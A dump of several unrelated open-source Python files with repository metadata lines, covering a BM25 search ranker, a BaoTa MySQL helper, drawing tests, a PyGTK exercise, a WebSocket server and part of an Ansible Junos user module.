score = 0
# query
queryWords = self.words(query)
        for x in queryWords:
try:
tf_x = tf[x]
            except:
continue
try:
df_x = df[x]
except:
continue
# inverse document frequency of the term.
idf = log(n/df_x)
# correction factor
correction = float((k + 1)*(tf_x))/(k*(1-b) + b*(l/(l_av)) + (tf_x))
# total contribution
contribution = idf * correction
score += contribution
return score
def ranking(self, query, k, b):
"""
Ranking of the documents based on their relevance to the query.
Arguments:
query: The search query
Returns:
A dictionary of all the documents in the corpus with their corresponding relevance odds ratio.
"""
if (k != None):
k = k
else:
k = 0
if (b != None):
b = b
else:
b = 0
documents = self.text
rankingDict = defaultdict(float)
for d in documents.keys():
docText = documents[d]
score = self.docScore(docText, query, k, b)
rankingDict[d] = score
return rankingDict
def search(self, query, n_docs, k=None, b=None):
"""
        Returns documents which are most relevant to the query.
Ranking is done by decreasing odds ratio for the document to be relevant for the query.
Arguments:
String query : Search query
            Integer n_docs : Number of matching documents retrieved.
Float k : tuning parameter for term frequency, (0<=k<=1).
A value of 0 corresponds to a binary model (no term frequency),
and a large value corresponds to using raw term frequency
            Float b: tuning parameter for document length, (0<=b<=1).
b = 1 corresponds to fully scaling the term weight by the document length,
while b = 0 corresponds to no length normalization.
Returns:
A list of length n_docs containing documents most relevant to the search query.
            The list is sorted in descending order.
"""
if (n_docs > len(self.corpus)):
n_docs = len(self.corpus)
relevantDocs = []
if (k != None):
k = k
if (b != None):
b = b
rankings = self.ranking(query, k, b)
rankings = sorted(rankings.iteritems(), key=operator.itemgetter(1), reverse=True)
for i in range(n_docs):
u,v = rankings[i]
relevantDocs.append(u)
return relevantDocs
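# Hedged usage sketch (an addition): 'corpus_dir' is a made-up path; k and b
# follow the BM25-style tuning ranges documented in search().
def example_search(corpus_dir):
    engine = ProbModel(corpus_dir)
    return engine.search('information retrieval', n_docs=5, k=0.5, b=0.75)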
|
WZQ1397/automatic-repo
|
python/FileSystem/BTpanel/btclass/panelMysql.py
|
Python
|
lgpl-3.0
| 3,122
| 0.02675
|
#coding: utf-8
# +-------------------------------------------------------------------
# | BaoTa (宝塔) Linux Panel
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 BaoTa Software (http://bt.cn) All rights reserved.
# +-------------------------------------------------------------------
# | Author: 黄文良 <2879625666@qq.com>
# +-------------------------------------------------------------------
import re,os
class panelMysql:
__DB_PASS = None
__DB_USER = 'root'
__DB_PORT = 3306
__DB_HOST = '127.0.0.1'
__DB_CONN = None
__DB_CUR = None
__DB_ERR = None
__DB_HOST_CONF = 'data/mysqlHost.pl';
    # Connect to the MySQL database
def __Conn(self):
try:
import public
try:
import MySQLdb
except Exception,ex:
self.__DB_ERR = ex
return False;
try:
myconf = public.readFile('/etc/my.cnf');
rep = "port\s*=\s*([0-9]+)"
self.__DB_PORT = int(re.search(rep,myconf).groups()[0]);
except:
self.__DB_PORT = 3306;
self.__DB_PASS = public.M('config').where('id=?',(1,)).getField('mysql_root');
try:
if os.path.exists(self.__DB_HOST_CONF): self.__DB_HOST = public.readFile(self.__DB_HOST_CONF);
self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
except MySQLdb.Error,e:
if e[0] != 2003:
self.__DB_ERR = e
return False
if self.__DB_HOST == 'localhost':
self.__DB_HOST = '127.0.0.1';
else:
self.__DB_HOST = 'localhost';
public.writeFile(self.__DB_HOST_CONF,self.__DB_HOST);
                self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
self.__DB_CUR = self.__DB_CONN.cursor()
return True
except MySQLdb.Error,e:
self.__DB_ERR = e
return False
def execute(self,sql):
        # Execute a SQL statement and return the number of affected rows
if not self.__Conn(): return self.__DB_ERR
try:
result = self.__DB_CUR.execute(sql)
self.__DB_CONN.commit()
self.__Close()
return result
except Exception,ex:
return ex
def query(self,sql):
        # Execute a SQL statement and return the result set
if not self.__Conn(): return self.__DB_ERR
try:
self.__DB_CUR.execute(sql)
result = self.__DB_CUR.fetchall()
            # Convert tuples to lists
data = map(list,result)
self.__Close()
return data
except Exception,ex:
return ex
    # Close the connection
def __Close(self):
self.__DB_CUR.close()
self.__DB_CONN.close()
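# Hedged usage sketch (an addition, not part of the original class): both
# execute() and query() return the exception object on failure, so callers
# should type-check the result before using it.
def example_list_databases():
    result = panelMysql().query("SHOW DATABASES")
    if isinstance(result, list):
        return [row[0] for row in result]
    return []  # result was an exception object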
|
pegurnee/2015-01-341
|
projects/project1_mini_python/python_mini_project.py
|
Python
|
mit
| 412
| 0.002427
|
def at_len(the_list):
"""
Takes a list and returns the number
of atomic elements (basic unit of data)
of the list
:param the_list: a list of elements
:return: the number of atomic elements in the list
"""
count = 0
for each_elem in the_list:
        if isinstance(each_elem, list):
count += at_len(each_elem)
else:
count += 1
return count
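# Hedged worked examples (an addition): nested lists contribute only their
# atomic elements to the count.
assert at_len([1, [2, [3, 4]], 5]) == 5
assert at_len([]) == 0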
|
richard-shepherd/monopyly
|
monopyly/game/dice.py
|
Python
|
mit
| 436
| 0
|
import random
class Dice(object):
'''
Generates random numbers by rolling two 'dice'.
    The reason for this class existing is so that it can be
mocked and replaced with a deterministic version for
testing.
'''
def roll(self):
'''
        Returns two values: the rolls of the two dice.
'''
        roll1 = random.randint(1, 6)
roll2 = random.randint(1, 6)
return roll1, roll2
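# Hedged sketch (an addition): the deterministic stand-in the docstring
# alludes to could look like this in a test.
class FixedDice(Dice):
    '''Always rolls the same pair; useful for reproducible tests.'''
    def __init__(self, roll1, roll2):
        self._rolls = (roll1, roll2)
    def roll(self):
        return self._rolls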
|
iambernie/hdf5handler
|
examples/opening.py
|
Python
|
mit
| 183
| 0.005464
|
#!/usr/bin/env python
from hdf5handler import HDF5Handler
handler = HDF5Handler('mydata.hdf5')
handler.open()
for i in range(100):
    handler.put(i, 'numbers')
handler.close()
|
nylas/sync-engine
|
migrations/versions/120_simplify_transaction_log.py
|
Python
|
agpl-3.0
| 688
| 0.002907
|
"""simpli
|
fy transaction log
Revision ID: 8c2406df6f8
Revises: 58732bb5d14b
Create Date: 2014-08-08 01:57:17.144405
"""
# revision identifiers, used by Alembic.
revision = '8c2406df6f8'
down_revision = '58732bb5d14b'
from alembic import op
from sqlalchemy.sql import text
def upgrade():
conn = op.get_bind()
conn.execute(text('''
        ALTER TABLE transaction
CHANGE public_snapshot snapshot LONGTEXT,
CHANGE table_name object_type VARCHAR(20),
DROP COLUMN private_snapshot,
DROP COLUMN delta,
ADD INDEX `ix_transaction_object_public_id` (`object_public_id`)
'''))
def downgrade():
raise Exception()
|
tommy-u/enable
|
kiva/tests/drawing_tester.py
|
Python
|
bsd-3-clause
| 5,452
| 0.000183
|
import contextlib
import os
import shutil
import tempfile
import numpy
from PIL import Image
from kiva.fonttools import Font
from kiva.constants import MODERN
class DrawingTester(object):
""" Basic drawing tests for graphics contexts.
"""
def setUp(self):
self.directory = tempfile.mkdtemp()
self.filename = os.path.join(self.directory, 'rendered')
self.gc = self.create_graphics_context(300, 300)
self.gc.clear()
self.gc.set_stroke_color((1.0, 0.0, 0.0))
self.gc.set_fill_color((1.0, 0.0, 0.0))
self.gc.set_line_width(5)
def tearDown(self):
del self.gc
shutil.rmtree(self.directory)
def test_line(self):
with self.draw_and_check():
            self.gc.begin_path()
self.gc.move_to(107, 204)
self.gc.line_to(107, 104)
self.gc.stroke_path()
def test_rectangle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(107, 104)
            self.gc.line_to(107, 184)
self.gc.line_to(187, 184)
self.gc.line_to(187, 104)
self.gc.line_to(107, 104)
self.gc.stroke_path()
def test_rect(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.rect(0, 0, 200, 200)
self.gc.stroke_path()
def test_circle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.stroke_path()
def test_quarter_circle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, numpy.pi / 2)
self.gc.stroke_path()
def test_text(self):
with self.draw_and_check():
font = Font(family=MODERN)
font.size = 24
self.gc.set_font(font)
self.gc.set_text_position(23, 67)
self.gc.show_text("hello kiva")
def test_circle_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
def test_star_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.fill_path()
def test_star_eof_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.eof_fill_path()
def test_circle_clip(self):
with self.draw_and_check():
self.gc.clip_to_rect(150, 150, 100, 100)
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
def test_text_clip(self):
with self.draw_and_check():
self.gc.clip_to_rect(23, 77, 100, 23)
font = Font(family=MODERN)
font.size = 24
self.gc.set_font(font)
self.gc.set_text_position(23, 67)
self.gc.show_text("hello kiva")
def test_star_clip(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.close_path()
self.gc.clip()
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
#### Required methods ####################################################
@contextlib.contextmanager
def draw_and_check(self):
""" A context manager to check the result.
"""
raise NotImplementedError()
def create_graphics_context(self, width, length):
""" Create the desired graphics context
"""
raise NotImplementedError()
class DrawingImageTester(DrawingTester):
""" Basic drawing tests for graphics contexts of gui toolkits.
"""
@contextlib.contextmanager
def draw_and_check(self):
yield
filename = "{0}.png".format(self.filename)
self.gc.save(filename)
self.assertImageSavedWithContent(filename)
def assertImageSavedWithContent(self, filename):
""" Load the image and check that there is some content in it.
"""
image = numpy.array(Image.open(filename))
# default is expected to be a totally white image
self.assertEqual(image.shape[:2], (300, 300))
if image.shape[2] == 3:
check = numpy.sum(image == [255, 0, 0], axis=2) == 3
elif image.shape[2] == 4:
check = numpy.sum(image == [255, 0, 0, 255], axis=2) == 4
else:
self.fail(
'Pixel size is not 3 or 4, but {0}'.format(image.shape[2]))
if check.any():
return
self.fail('The image looks empty, no red pixels where drawn')
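# Hedged sketch (an addition, not part of the module): a concrete suite mixes
# in unittest.TestCase (supplying the assertions used above) and implements
# create_graphics_context(). kiva.image.GraphicsContext is a plausible backend
# choice here, not necessarily the one the real suites use.
import unittest
class ExampleImageDrawingTest(DrawingImageTester, unittest.TestCase):
    def create_graphics_context(self, width, length):
        from kiva.image import GraphicsContext
        return GraphicsContext((width, length))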
|
jenshnielsen/basemap
|
examples/maskoceans.py
|
Python
|
gpl-2.0
| 1,922
| 0.021852
|
from mpl_toolkits.basemap import Basemap, shiftgrid, maskoceans, interp
import numpy as np
import matplotlib.pyplot as plt
# example showing how to mask out 'wet' areas on a contour or pcolor plot.
topodatin = np.loadtxt('etopo20data.gz')
lonsin = np.loadtxt('etopo20lons.gz')
latsin = np.loadtxt('etopo20lats.gz')
# shift data so lons go from -180 to 180 instead of 20 to 380.
topoin,lons1 = shiftgrid(180.,topodatin,lonsin,start=False)
lats1 = latsin
fig=plt.figure()
# setup basemap
m=Basemap(resolution='l',projection='lcc',lon_0=-100,lat_0=40,width=8.e6,height=6.e6)
lons, lats = np.meshgrid(lons1,lats1)
x, y = m(lons, lats)
# interpolate land/sea mask to topo grid, mask ocean values.
# output may look 'blocky' near coastlines, since data is at much
# lower resolution than land/sea mask.
topo = maskoceans(lons, lats, topoin)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (original grid)')
fig=plt.figure()
# interpolate topo data to higher resolution grid (to better match
# the land/sea mask). Output looks less 'blocky' near coastlines.
nlats = 3*topoin.shape[0]
nlons = 3*topoin.shape[1]
lons = np.linspace(-180,180,nlons)
lats = np.linspace(-90,90,nlats)
lons, lats = np.meshgrid(lons, lats)
x, y = m(lons, lats)
topo = interp(topoin,lons1,lats1,lons,lats,order=1)
# interpolate land/sea mask to topo grid, mask ocean values.
topo = maskoceans(lons, lats, topo)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (data on finer grid)')
plt.show()
|
freedesktop-unofficial-mirror/zeitgeist__zeitgeist
|
examples/python/find_events.py
|
Python
|
lgpl-2.1
| 1,009
| 0.011893
|
from gi.repository import Zeitgeist, GLib
log = Zeitgeist.Log.get_default()
mainloop = GLib.MainLoop()
def on_events_received(log, result, data):
events = log.find_events_finish(result)
for i in xrange(events.size()):
event = events.next_value()
if event:
print "Event id:", event.get_property("id")
for i in xrange(event.num_subjects()):
subj = event.get_subject(i)
print " -", subj.get_property("uri")
mainloop.quit()
subject = Zeitgeist.Subject.full("", Zeitgeist.AUDIO, "", "", "", "", "")
event = Zeitgeist.Event()
event.add_subject(subject)
time_range = Zeitgeist.TimeRange.anytime ();
log.find_events(time_range,
[event],
Zeitgeist.StorageState.ANY,
20,
Zeitgeist.ResultType.MOST_RECENT_SUBJECTS,
None,
                on_events_received,
None)
mainloop.run()
|
ggimenez/HomeworkDesigner.activity
|
template.activity/simpleassociation.py
|
Python
|
gpl-2.0
| 17,950
| 0.036331
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pygtk
pygtk.require('2.0')
import gtk
import json
from collections import namedtuple
from array import *
import pango
import random
from gettext import gettext as _
import copy
''' Scales '''
IMAGES_SCALE = [100, 100]
LETTERS_SCALE = [100, 100]
'''Color Selection association
Reference of colours codes :http://www.rapidtables.com/web/color/RGB_Color.htm
'''
COLOURS_ASSOCIATION = []
COLOURS_ASSOCIATION.append({"colour":"#0074DF", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#FF1F68", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#D9E021", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#6FC72B", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#F1C001", "available":True})
EVENTBOX_SCALE = [100,100]
'''Current item selection association'''
SELECTED_COLOUR = gtk.gdk.Color("#FFFF00")
FONT_DESCRIPTION_BIG = 'DejaVu Bold 30'
FONT_DESCRIPTION_MEDIUM = 'DejaVu Bold 15'
class SimpleAssociation():
def saveExerciseState(self):
self.mainWindows.getLogger().debug("Inside to saveExerciseState")
stateJson = {}
stateJson['optionsSelectionState'] = self.optionsSelectionState
stateJson['correspondencesSelectionState'] = self.correspondencesSelectionState
stateJson['currentOptionSelected'] = self.currentOptionSelected
stateJson['lastOptionSelected'] = self.lastOptionSelected
stateJson['currentCorrespondenceSelected'] = self.currentCorrespondenceSelected
stateJson['lastCorrespondenceSelected'] = self.lastCorrespondenceSelected
stateJson['optionsList'] = self.optionsList
stateJson['correspondencesList'] = self.correspondencesList
stateJson['COLOURS_ASSOCIATION'] = self.COLOURS_ASSOCIATION
stateJson['exerciseCompleted'] = self.exerciseCompleted
return stateJson
def disconnectEventBoxs(self):
for index, eventBox in enumerate(self.allEventBoxs):
eventBox.disconnect(self.idHandlers[index])
def getWindow(self, exercise, mainWindows, stateJson):
self.mainWindows = mainWindows
windowSimpleAssociation = gtk.ScrolledWindow()
windowSimpleAssociation.exerciseInstance = self
label = gtk.Label(exercise.name)
label.modify_font(pango.FontDescription("Sans 10"))
vBoxWindows = gtk.VBox(False, 5)
hBoxExercises = gtk.HBox(False, 5)
self.vBoxOptions = gtk.VBox(False, 5)
self.vBoxOptions.set_border_width(10)
self.vBoxCorrespondences = gtk.VBox(False, 5)
self.vBoxCorrespondences.set_border_width(10)
frameExercises = gtk.Frame()
frameExercises.add(hBoxExercises)
self.idHandlers = []
        self.allEventBoxs = []
self.exerciseCompleted = False
if stateJson is None:
self.optionsSelectionState = []
self.correspondencesSelectionState = []
self.currentOptionSelected = -1
self.lastOptionSelected = -1
self.currentCorrespondenceSelected = -1
            self.lastCorrespondenceSelected = -1
self.optionsList, self.correspondencesList = self.disorderCorrespondences(exercise.items)
self.COLOURS_ASSOCIATION = COLOURS_ASSOCIATION
else:
self.optionsSelectionState = stateJson['optionsSelectionState']
self.correspondencesSelectionState = stateJson['correspondencesSelectionState']
self.currentOptionSelected = stateJson['currentOptionSelected']
self.lastOptionSelected = stateJson['lastOptionSelected']
self.currentCorrespondenceSelected = stateJson['currentCorrespondenceSelected']
self.lastCorrespondenceSelected = stateJson['lastCorrespondenceSelected']
self.optionsList = stateJson['optionsList']
self.correspondencesList = stateJson['correspondencesList']
self.COLOURS_ASSOCIATION = stateJson['COLOURS_ASSOCIATION']
self.exerciseCompleted = stateJson['exerciseCompleted']
self.mainWindows.getLogger().debug( self.COLOURS_ASSOCIATION )
firstOptionEventBox = None
frameVBoxOptions = gtk.Frame()
frameVBoxOptions.set_border_width(10)
#dark orange
frameVBoxOptions.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color("#FF8C00"))
frameVBoxCorrespondences = gtk.Frame()
frameVBoxCorrespondences.set_border_width(10)
#dark slate blue
frameVBoxCorrespondences.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color('#483D8B'))
for index, option in enumerate(self.optionsList):
'''Options'''
self.mainWindows.getLogger().debug(option)
eventBoxOption = self.createEventBox(option['option']['value'], option['option']['type'])
if not self.exerciseCompleted:
idHandler = eventBoxOption.connect("button-press-event", self.imageSelectedCallBack, self.vBoxCorrespondences)
self.allEventBoxs.append(eventBoxOption)
self.idHandlers.append(idHandler)
self.addEventBoxToVBox(eventBoxOption, self.vBoxOptions)
if index == 0:
firstOptionEventBox = eventBoxOption
if stateJson is None:
self.optionsSelectionState.append ( {"selected": -1, "pair": option['indexPair'], "colour": None} )
'''Correspondences'''
eventBoxCorrespondence = ( self.createEventBox(self.correspondencesList[index]['correspondence']['value'],
self.correspondencesList[index]['correspondence']['type']) )
if not self.exerciseCompleted:
idHandler = eventBoxCorrespondence.connect("button_press_event", self.pairSelectedCallBack, self.vBoxOptions)
self.allEventBoxs.append(eventBoxCorrespondence)
self.idHandlers.append(idHandler)
self.addEventBoxToVBox(eventBoxCorrespondence, self.vBoxCorrespondences)
if stateJson is None:
( self.correspondencesSelectionState.append( {"selected": -1,
"pair":self.correspondencesList[index]['indexPair'], "colour": None} ) )
frameVBoxOptions.add(self.vBoxOptions)
frameVBoxCorrespondences.add(self.vBoxCorrespondences)
hBoxExercises.pack_start(frameVBoxOptions, True,True,5)
hBoxExercises.pack_start(frameVBoxCorrespondences, True,True,50)
vBoxWindows.pack_start(frameExercises, True,True,0)
windowSimpleAssociation.add_with_viewport(vBoxWindows)
if stateJson is not None:
self.repaintResumeItems()
else:
self.setAllAvailableSelectionColour()
self.selectFirtImage(firstOptionEventBox)
return windowSimpleAssociation
def repaintResumeItems(self):
for index, value in enumerate(self.optionsSelectionState):
eventBoxOption = self.vBoxOptions.get_children()[index].get_children()[0]
eventBoxCorrespondence = self.vBoxCorrespondences.get_children()[index].get_children()[0]
if value['colour'] is not None:
self.mainWindows.getLogger().debug(value)
self.changeBackgroundColour(eventBoxOption,str(value['colour']['colour']))
valueCorresondence = self.correspondencesSelectionState[index]
self.mainWindows.getLogger().debug(valueCorresondence)
if valueCorresondence['colour'] is not None:
self.changeBackgroundColour(eventBoxCorrespondence, str(valueCorresondence['colour']['colour']))
firstFrameOption = self.vBoxOptions.get_children()[self.currentOptionSelected]
self.fakeSelection(firstFrameOption)
def addEventBoxToVBox(self, eventBox, vBox):
frameEventBox = gtk.EventBox()
frameEventBox.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color("white"))
eventBox.set_border_width(5)
frameEventBox.add(eventBox)
vBox.pack_start(frameEventBox, False,False,0)
def createEventBox(self, payload, typePayload):
eventBox = gtk.EventBox()
eventBox.set_size_request(EVENTBOX_SCALE[0], EVENTBOX_SCALE[1])
if typePayload == "image":
imageContainer = gtk.Image()
pixbuf = gtk.gdk.pixbuf_new_from_file(payload).scale_simple(IMAGES_SCALE[0], IMAGES_SCALE[1], 2)
imageContainer.set_from_pixbuf(pixbuf)
eventBox.add(imageContainer)
eventBox.modify_bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
if typePayload == "letter":
letterLabel = gtk.Label(payload)
if len(payload) <= 8:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_BIG))
else:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_MEDIUM))
eventBox.add(letterLabel)
eventBox.modify_bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
return eventBox
def selectFirtImage(self, firstEvenBox):
ava
|
fos/fos-legacy
|
scratch/very_scratch/server/example7/webSocketServer.py
|
Python
|
bsd-3-clause
| 4,050
| 0.008889
|
#!/usr/bin/env python
import sys
import time
import socket
import threading
import Queue
import ConfigParser
import logging as log
from connection import *
from connectionManager import *
log.basicConfig(level=log.DEBUG, stream=sys.stderr)
#Dynamically instantiate an instance of an Application-derived class from a module
#The module must provide an Instantiate() method
def InstantiateApplication(moduleName, *classArgs):
module = __import__(moduleName)
log.info("InstantiateApplication - Module: " + repr(module))
classInstance = module.Instantiate(*classArgs)
log.info( repr(classInstance) )
return classInstance
#
#MAIN
#
if __name__ == "__main__":
log.info('Loading configuration info')
config = ConfigParser.ConfigParser()
config.read('config.txt')
port = config.getint('Server', 'Port')
connectionQueueSize = config.getint('Server', 'ConnectionQueueSize')
#Start applications
log.info('Loading Applications...')
applications = {}
#Admin app
adminApp = InstantiateApplication('AdminApplication', 'admin')
applications['/'] = adminApp
adminAppThread = threading.Thread(target=adminApp.Run).start()
#Dynamically load applications specified in config.txt
applicationList = config.items('Applications')
for application in applicationList:
appModuleName = application[1]
appInstanceName = application[0]
log.info('\tLoading instance of application %s as %s' % (appModuleName, appInstanceName))
applicationInstance = InstantiateApplication(appModuleName, appInstanceName)
applications['/' + appInstanceName] = applicationInstance
applicationThread = threading.Thread(target=applicationInstance.Run).start()
log.info("Applications Loaded:")
log.info(repr(applications))
#done with config
del config
log.info('Starting web socket server')
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind( ('', port) )
serverSocket.listen(connectionQueueSize)
del port
del connectionQueueSize
#Start connection manager
connectionManager = ConnectionManager()
connectionManagerThread = threading.Thread(target=connectionManager.Run).start()
#Accept clients
try:
while 1:
log.info('Waiting to accept client connection...')
            clientSocket, clientAddress = serverSocket.accept()
try:
log.info('Got client connection from %s' % (repr(clientAddress)))
connection = Connection(clientSocket, clientAddress)
log.info('Client %s requested %s application' % (repr(clientAddress), connection.ApplicationPath))
if connection.ApplicationPath in applications:
requestedApp = applications[connection.ApplicationPath]
log.info('Client %s requested app: %s ' % (repr(clientAddress), repr(requestedApp)))
if requestedApp.AddClient(connection) == True:
connectionManager.AddConnection(connection)
else:
connection.Close()
connection = None
else:
log.info("Client %s requested an unknown Application. Closing connection." % repr(clientAddress))
connection.Close()
connection = None
except Exception as ex:
                log.info('Exception occurred while attempting to establish client connection from %s.' % repr(clientAddress))
log.info(repr(ex))
except Exception as ex:
log.info('Server encountered an unhandled exception.')
log.info(repr(ex))
log.info('Web socket server closing.')
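# Hedged sketch (an addition, not part of the server): the loader above only
# requires that an application module expose Instantiate(); the names below
# are hypothetical. The object must provide Run() and AddClient(connection),
# the two entry points this server calls.
class EchoApplication(object):
    def __init__(self, name):
        self.name = name
        self.clients = []
    def AddClient(self, connection):
        self.clients.append(connection)
        return True
    def Run(self):
        pass  # application main loop would go here
def Instantiate(name):
    return EchoApplication(name)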
|
dataxu/ansible
|
lib/ansible/modules/network/junos/junos_user.py
|
Python
|
gpl-3.0
| 11,343
| 0.001851
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: junos_user
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage local user accounts on Juniper JUNOS devices
description:
- This module manages locally configured user accounts on remote
network devices running the JUNOS operating system. It provides
a set of arguments for creating, removing and updating locally
defined accounts
extends_documentation_fragment: junos
options:
aggregate:
description:
- The C(aggregate) argument defines a list of users to be configured
on the remote device. The list of users will be compared against
the current users and only changes will be added or removed from
the device configuration. This argument is mutually exclusive with
the name argument.
version_added: "2.4"
required: False
default: null
aliases: ['users', 'collection']
name:
description:
- The C(name) argument defines the username of the user to be created
on the system. This argument must follow appropriate usernaming
conventions for the target device running JUNOS. This argument is
mutually exclusive with the C(aggregate) argument.
required: false
default: null
full_name:
description:
- The C(full_name) argument provides the full name of the user
account to be created on the remote device. This argument accepts
any text string value.
required: false
default: null
role:
description:
- The C(role) argument defines the role of the user account on the
remote system. User accounts can have more than one role
configured.
required: false
choices: ['operator', 'read-only', 'super-user', 'unauthorized']
sshkey:
description:
- The C(sshkey) argument defines the public SSH key to be configured
for the user account on the remote system. This argument must
be a valid SSH key
required: false
default: null
purge:
description:
- The C(purge) argument instructs the module to consider the
users definition absolute. It will remove any previously configured
users on the device with the exception of the current defined
set of aggregate.
required: false
default: false
state:
description:
- The C(state) argument configures the state of the user definitions
as it relates to the device operational configuration. When set
to I(present), the user should be configured in the device active
configuration and when set to I(absent) the user should not be
in the device active configuration
required: false
default: present
choices: ['present', 'absent']
active:
description:
- Specifies whether or not the configuration is active or deactivated
default: True
choices: [True, False]
version_added: "2.4"
requirements:
- ncclient (>=v0.5.2)
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- Tested against vSRX JUNOS version 15.1X49-D15.4, vqfx-10000 JUNOS Version 15.1X53-D60.4.
- Recommended connection is C(netconf). See L(the Junos OS Platform Options,../network/user_guide/platform_junos.html).
- This module also works with C(local) connections for legacy playbooks.
"""
EXAMPLES = """
- name: create new user account
junos_user:
name: ansible
role: super-user
sshkey: "{{ lookup('file', '~/.ssh/ansible.pub') }}"
state: present
- name: remove a user account
junos_user:
name: ansible
state: absent
- name: remove all user accounts except ansible
junos_user:
aggregate:
- name: ansible
purge: yes
- name: Create list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: present}
- {name: test_user2, full_name: test_user2, role: read-only, state: present}
- name: Delete list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: absent}
- {name: test_user2, full_name: test_user2, role: read-only, state: absent}
"""
RETURN = """
diff.prepared:
description: Configuration difference before and after applying change.
returned: when configuration is changed and diff option is enabled.
type: string
sample: >
[edit system login]
+ user test-user {
+ uid 2005;
+ class read-only;
+ }
"""
from functools import partial
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
from ansible.module_utils.network.junos.junos import junos_argument_spec, get_connection
from ansible.module_utils.network.junos.junos import commit_configuration, discard_changes
from ansible.module_utils.network.junos.junos import load_config, locked_config
from ansible.module_utils.six import iteritems
try:
from lxml.etree import Element, SubElement, tostring
except ImportError:
from xml.etree.ElementTree import Element, SubElement, tostring
ROLES = ['operator', 'read-only', 'super-user', 'unauthorized']
USE_PERSISTENT_CONNECTION = True
def handle_purge(module, want):
want_users = [item['name'] for item in want]
element = Element('system')
login = SubElement(element, 'login')
conn = get_connection(module)
reply = conn.execute_rpc(tostring(Element('get-configuration')), ignore_warning=False)
users = reply.xpath('configuration/system/login/user/name')
if users:
for item in users:
name = item.text
if name not in want_users and name != 'root':
user = SubElement(login, 'user', {'operation': 'delete'})
SubElement(user, 'name').text = name
if element.xpath('/system/login/user/name'):
return element
def map_obj_to_ele(module, want):
element = Element('system')
login = SubElement(element, 'login')
for item in want:
if item['state'] != 'present':
if item['name'] == 'root':
module.fail_json(msg="cannot delete the 'root' account.")
operation = 'delete'
else:
operation = 'merge'
user = SubElement(login, 'user', {'operation': operation})
SubElement(user, 'name').text = item['name']
if operation == 'merge':
            if item['active']:
                user.set('active', 'active')
else:
user.set('inactive', 'inactive')
if item['role']:
SubElement(user, 'class').text = item['role']
if item.get('full_name'):
SubElement(user, 'full-name').text = item['full_name']
if item.get('sshkey'):
auth = SubElement(user, 'authentication')
ssh_rsa = SubElement(auth, 'ssh-rsa')
key = SubElement(ssh_rsa, 'name').text = item['sshkey']
return element
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
